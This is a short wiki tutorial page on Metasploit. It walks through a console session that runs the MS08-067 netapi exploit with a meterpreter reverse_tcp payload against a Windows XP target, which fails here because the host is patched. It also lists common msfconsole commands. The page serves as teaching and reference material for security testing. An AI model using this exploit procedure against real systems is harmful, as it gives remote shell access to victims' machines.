Metasploit
Aus SchnallIchNet
Inhaltsverzeichnis
general example
running an exploit against netapi on a windows xp host
working for UNPATCHED WinXP-SP3 hosts...
# msfconsole [snipped some info output] msf > search ms08_067 Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/windows/smb/ms08_067_netapi 2008-10-28 great Microsoft Server Service Relative Path Stack Corruption msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set LHOST 10.0.my.host LHOST => 10.0.my.host msf exploit(ms08_067_netapi) > set RHOST 10.0.victim.host RHOST => 10.0.victim.host msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(ms08_067_netapi) > exploit [*] Started reverse handler on 10.0.my.host:4444 [-] Exploit exception: The connection timed out (10.0.victim.host:445). [*] Exploit completed, but no session was created. msf exploit(ms08_067_netapi) >
and as you can see: the host is patched ;-)
explaining the output:
- 1st starting msfconsole
- search for vulnerability-exploit ms08_067 and get the full path to the exploit
- say use the exploit
- set the local IP address (attacking host-ip) LHOST
- set the remote IP address (victim host) RHOST
- set the payload to send to victim host windows/meterpreter/reverse_tcp
which opens a revers tcp-connection - start exploiting: exploit
if the exploit was successful, you will get a prompt like this:
meterpreter> meterpreter> shell [snipped output of starting windows cmd]
useful commands
some useful commands...
search for an explizit exploit
search ms08_067
show available exploits
show exploits
show all payloads
show payloads
show infos yout an exploit
info exploit exploit/windows/smb/ms08_067_netapi
show infos about a payload
info payload windows/meterpreter/reverse_tcp
show options
if exploit and/or payload is already set, it will display informations about:
msf exploit(ms08_067_netapi) > show options Module options (exploit/windows/smb/ms08_067_netapi): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 445 yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique: seh, thread, process, none LHOST yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic Targeting msf exploit(ms08_067_netapi) >